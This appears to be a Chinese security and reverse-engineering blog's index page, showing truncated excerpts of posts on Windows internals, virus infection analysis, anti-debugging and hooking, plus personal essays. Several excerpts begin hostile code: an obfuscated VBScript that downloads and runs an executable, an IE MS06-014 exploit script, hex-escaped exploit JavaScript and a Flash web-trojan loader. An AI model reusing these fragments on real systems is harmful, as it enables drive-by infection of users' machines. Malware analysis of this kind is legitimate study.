原创 2009 更新一篇以示存在

如果不小心把windows中显示桌面文件删除了，别急，咱自己来diy一个，新建一文件，命令为"显示桌面.scf"或其他，然后输入以下内容，并保存：[Shell]Command=2IconFile=explorer.exe,3[Taskbar]Command=ToggleDesktop OK，现在就可双击"显示桌面.scf"玩了。 ps: Windows os

原创 泄露啊泄露

用了几天的PocketMusic，感觉总体挺不错的，特别客户化界面模式

转载 Endian的由来

Endian的由来一、引子　　在各种计算机体系结构中，对于字节、字等的存储机制有所不同，因而引发了计算机通信领域中一个很重要的问题，即通信双方交流的信息单元（比特、字节、字、双字等等）应该以什么样的顺序进行传送。如果不达成一致的规则，通信双方将无法进行正确的编/译码从而导致通信失败。目前在各种体系的计算机中通常采用的字节存储机制主要有两种：big-edian和little-endian。本文简要描

原创 Web OS体验

不多说，自己去体验：http://www.oos.cc很好，很强大。

原创 奋斗之2008-2009

      放弃是一种艰难的决择，记得第一次听向菲的《人生及选择》时，似乎不太理解，为什么要把别人的选择拿到台面上说道，对我有什么益处吗！然而我是继续听了下去的，一直到毕业，从中看到许多的坚强、执着与激情；也有爱；也有放弃之痛、坚定的执着。      当前我也站在选择的十字路口上，但我已选好了方向，即将放弃关系融洽的同事们、民族自豪感的工作（老总说的）、较好的工作学习环境、还有另一个10K的诱惑（

原创 在路上

《在路上》 刘欢那一天我不得已上路为不安分的心为自尊的生存为自我的证明路上的辛酸已融进我的眼睛心灵的困境已化作我的坚定在路上 用我心灵的呼声在路上 只为伴着我的人在路上 是我生命的远行在路上 只为温暖我的人温暖我的人... ...

转载 曝FLASE ODay，警惕FLASH网马

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马，该网马通过网页加载一个正常的FLASH文件，再在那个FLASH文件里调用嵌入恶意构造的FLASH文件，这时会导致溢出，从而可能执行任意指令。以下为调用页内容：  window.onerror=function(){return true;} function init(){window.status=”";}wind

原创 Sality.q病毒变种之EXE感染方式分析

/* Sality.q病毒变种之EXE感染方式分析 * 文件名：vcmgcd32.dll * MD5：ae22ca9f11ade8e362254b452cc07f78 * 壳：未加 * By Vincent.peng on 2008.04.08 */调试方法：在Fun为10003FF0的CreateThread断下，然后转EIP到10003FF0处。一、感染过程分析：1 保存文件属性、时间。2 设

原创 Windows 伪句柄

    Windows核心编程中的伪句柄，看了半天，也不知道说是什么，遂即跟踪了一下所给的API（GetCurrentProcess, GetCurrentThread），GetCurrentProcess反汇编代码为：OR EAX,FFFFFFFFRETNGetCurrentThread反汇编代码为：PUSH -2POP EAXRETN也就是说GetCurrentProcess返回值始终是0xF

原创 Point-H in XP

Point-H in XPMD5: a3d58bbb002e474c9ef1c05233f6e1f9取XP下的万能断点。该断点位于user32.dll的“F3 A5 8B C8 83 E1 03 F3 A4 E8”特征串处。参考资料：《Point-h in WinXP tutorial》

原创 Reverse

OllyDbg+WinXP万能断点法：POINT H收集翻译http://bbs.pediy.com/showthread.php?s=&threadid=10833&highlight=pointhPoint-h in WinXP english tutorial http://bbs.pediy.com/showthread.php?s=&threadid=8915&highlight=p

转载 什么是内存对齐

什么是内存对齐    考虑下面的结构：         struct foo         {           char c1;           short s;           char c2;           int i;          };        假设这个结构的成员在内存中是紧凑排列的，假设c1的地址是0，那么s的地址就应该是1，c2的地址就是3，i的地

原创 Hook ZwSetInformationFile, 根据目标路径拦截MoveFile移动文件

Hook ZwSetInformationFile, 根据目标路径拦截MoveFile移动文件 MoveFile的形式为：MoveFile( LPCTSTR lpExistingFileName, LPCTSTR lpNewFileName)，现需要根据lpNewFileName的路径来判断是否可以移动，在这我们Hook ZwSetInformationFile实现的，跟踪MoveFile可

原创 Realpalyer 最新漏洞下载

       近期出现利用realplayer 缓冲区溢出漏洞的脚本病毒，当用户浏览带有该脚本病毒网页时，电脑会被中入其他病毒、木马。请立即下载补丁程升级你的realplayer。       受影响的realplayer版本：RealPlayer 10.5 and RealPlayer 11 beta。       补丁下载地址：http://service.real.com/realp

原创 com/lsass.exe smss.exe(磁碟机病毒) 感染方式之我分析 -- 2008第一博

    为XXX研究所提供技术支持时截获的样本，com/lsass.exe smss.exe，病毒中文名为磁碟机病毒，貌似很强，此等病毒岂能错过，分析之，不感独乐，遂将感染方式贴上：感染文件类型：(文件全名后三位)1 .htm, tml, .js2 .exe3 .rar, .zipweb文件感染函数:1 按行读取web文件内容2 如果没有找到匹配的：document.write(""); 则在文件

原创 QQ trail

原创 Vista下程序提权

1 把下面内容保存到文件中：  version="1.0.0.0"  processorArchitecture="X86"  name="mulitray.exe.manifest"  type="win32"/>                    2 在资源中将刚刚的文件“导入”，资源类型命名为24，资源名为1。

原创 Vista程序提权

电脑通过手机GPRS功能的cmwap方式上网简介手机（NOKIA  N70）1、在电脑上安装数据线驱动程序（可到NOKIA官方网站下载DKU-2驱动程序）。2、把N70通过DKU-2数据线与电脑连接起来。3、在控制面版中找到“网络与拨号连接”程序组，并打开。4、选择“新建连接”，弹出网络连接向导，按下一步。5、在连接网络类型中选择第一项“拨号到专用网络”，点击下一步。6、在网络连接设备中选择调

原创 Windows快捷命令

1 控制面板control.exe  desk.cplhdwwiz.cplinetcpl.cplappwiz.cplintl.cpljoy.cplaccess.cplmain.cplncpa.cplnusrmgr.cpltimedate.cplmmsys.cplpowercfg.cplsysdm.cpltelephon.cplodbccp32.cpl

原创 病毒 资料篇

1 服务器ARP攻击《服务器被ARP攻击了》 http://www.zenghuijun.com/post/ARP-attack.html《服务器ARP病毒攻击分析与防御》http://www.cuobie.cn/blog/parser-server-arp-attack.html《ARP欺骗攻击防护》http://www.7x24.cn/colocation/arp-safety.htm《ARP

原创 windows 文件夹BUG

CreateDirectory(_T("D://Program Files//360safe//MFC42.DLL//10I11O10..//"), NULL); RemoveDirectory(_T("D://Program Files//360safe//MFC42.DLL//10I11O10..//"), NULL);dd

转载 病毒感染技术分析

前言病毒感染技术五花八门，这里对其做一大概介绍，并对一些应用不多但比较有潜力的技术加以分析。文中以Win32病毒为主，但也提搅艘恍〥OS病毒技术，由于涉及面比较广，错误在所难免，请大家多多包涵！ 一、传统技术这里说的传统，指的是比较典型、应用比较多的感染方式，而不是普通意义上“老掉牙”的那种传统！一般传统的病毒感染技术分成下面几类：1．后缀式感染这是DOS以及Windows下文件型病毒最常

原创 HArpsniffer.cpp

#include #include #include #include "Packet32.h"#include "YouHua.h"#pragma comment(lib, "packet.lib")#pragma comment(lib, "ws2_32.lib")#pragma comment(lib,"iphlpapi.lib") #define MAX_PACK_LEN 65535   

原创 IE MS06014漏洞share一下

密码：    Option Explicit    function Decode(k)        dim s,t,i        s=Split(k," ")        t=""        For i = 0 To UBound(s)        t=t+Chr(s(i))        Next        Decode=t    End Function         

转载 C语言函数调用约定

在C语言中，假设我们有这样的一个函数：int function(int a,int b)调 用时只要用result = function(1,2)这样的方式就可以使用这个函数。但是，当高级语言被编译成计算机可以识别的机器码时，有一个问题就凸现出来：在CPU中，计算 机没有办法知道一个函数调用需要多少个、什么样的参数，也没有硬件可以保存这些参数。也就是说，计算机不知道怎么给这个函

转载 网络安全知识：认识变形病毒的基本类型

病毒传播到目标后，病毒自身代码和结构在空间上、时间上产生了不同的变化，这种病毒被称为是变形病毒。 我们以下简要划分的变形病毒种类分为四类。 第一类变形病毒的特性是：具备普通病毒所具有的基本特性，然而，病毒每传播到一个目标后，其自身代码与前一目标中的病毒代码几乎没有三个连续的字节是相同的，但这些代码其相对空间的排列位置是不变动的，这里称为：一维变形病毒。 在一维变形病毒中, 个别的

原创 病毒命名规则

 一般格式为：..。病毒前缀是指一个病毒的种类，他是用来区别病毒的种族分类的。不同的种类的病毒，其前缀也是不同的。比如我们常见的木马病毒的前缀Trojan，蠕虫病毒的前缀是Worm等等还有其他的。病毒名是指一个病毒的家族特征，是用来区别和标识病毒家族的，如以前著名的CIH病毒的家族名都是统一的“CIH”，还有近期闹得正欢的振荡波蠕虫病毒的家族名是“Sasser”。病毒后缀是指一个病毒的变种特征，是

原创 hide window in VC

/*        DWORD dwExStyle = WS_EX_TOOLWINDOW;        SetWindowLong( this->m_hWnd, GWL_EXSTYLE, dwExStyle );        SetWindowPos( NULL, 0, 0, 0, 0, SWP_HIDEWINDOW );*/用CMD启带参数的MFC程序，并根据参数隐藏自窗体。方法：1 新建一

原创 一段加密的Javascript风险代码

一段加密的Javascript风险代码，利用IE及其插件漏洞传播病毒：var vDA1 = new window["/x44/x61/x74/x65"]()//datevDA1["/x73/x65/x74/x54/x69/x6d/x65"](vDA1["/x67/x65/x74/x54/x69/x6d/x65"]() + 24*60*60*1000)//setTime getTimevar eOT

原创 UnLoadDll

// 程序功能：结束进程中的一个模块。// 程序日期：2006.10.8// 程序说明：这个程序写于2003年，主要针对一些木马注入程序。以往结束远程注入木马(dll)时需要// 结束进程，这个程序不用结束进程而直接结束单个DLL。结束后会出现一些问题，某些情况//           下会导致整个进程异常，这是很正常的，例如结束了一个进程需要调用的DLL；或者结束后DLL//          

原创 取一个进程的父进程名

#include #include #include #include int main(int argc, char* argv[]){    DWORD dwCurProId = 0, dwParentId = 0;    HANDLE hProcess = NULL, hProcessSnap = NULL;    PROCESSENTRY32 pe32 = {0};    pe32.dwS

原创 script virus source code

//////////1on error resume nextdl = "http://10.0.0.58/VincentTest/top.exe":fname1="top.exe"    z1="She":z2="ll.A":z3="ppli":z4="cat":z5="io":z6="n"    zz=z1&z2&z3&z4&z5&z6    sub shellexe(zz,fname1)  

原创 Javascript判断browser类型及版本

if(navigator.appName == "Microsoft Internet Explorer"){  if(navigator.appVersion.match(/7./i)==7.)  {    //document.write("");    confirm("Current web browser is IE 7.");  }  else  {   confirm("Curr

原创 Anti Debug 二

利用GetTickCount API的Anti Debug的例子, 反汇编代码：004088C8  |.  FF55 EC       CALL DWORD PTR SS:[EBP-14]               ;  GetTickCount004088CB  |.  8945 F8       MOV DWORD PTR SS:[EBP-8],EAX；得到第一个GetTickCount值0

原创 asfdasdf

void WriteToTmpFile(){  FILE *f = _tfopen( _T("c://aByFilter.tmp"), _T("wba") );  if( NULL == f )  {   OutputDebugString( _T("ProcessMailContent Err 1") );   return iRet;  }  else;    fwrite( lpBuffer

原创 技术资料篇 -- 不断更新中...

《基于SPI的数据报过滤原理与实现》 http://www.vckbase.com/document/viewdoc/?id=643#A5《关于spi滤包技术的研究》 http://dev.youkuaiyun.com/develop/article/69/69004.shtm《浅析COM的思想及原理》 http://dev.youkuaiyun.com/article/71/71177.shtm《深入了解Sniffer

转载 MS的chm文件格式及库和原代码

Microsofts HTML Help (.chm) formatPrefaceThis is documentation on the .chm format used by Microsoft HTML Help. This format has been reverse engineered in the past, but as far as I know this is

原创 chm反编译命令

命令格式：hh.exe -decompile e.g. hh.exe -decompile c:/testDeChm test.chm

转载 强行卸载DLL模块

// 程序功能：结束进程中的一个模块。// 程序日期：2006.10.8 // 程序说明：这个程序写于2003年，主要针对一些木马注入程序。以往结束远程注入木马(dll)时需要 // 结束进程，这个程序不用结束进程而直接结束单个DLL。结束后会出现一些问题，某些情况//           下会导致整个进程异常，这是很正常的，例如结束了一个进程需要调用的DLL；或者结束后DLL//        

原创 溢出你心

Love程序写再好,却无法运行在你的心田。服务器入侵的再多,能得到你心的只有Friend权限。是你用了love的专杀软件，杀了我的Love shell？还是谁给你心设置了防火墙，拒绝我所有对你心更高的访问权限？寻找其他的提权，开启我心的snifferlove无奈Love隧道加密成为我的难点。找不到你心再高权限的注入点,扫不到你心更高权限的空口令，更找不到心更高权限的溢出点。你心设置了nRnd+md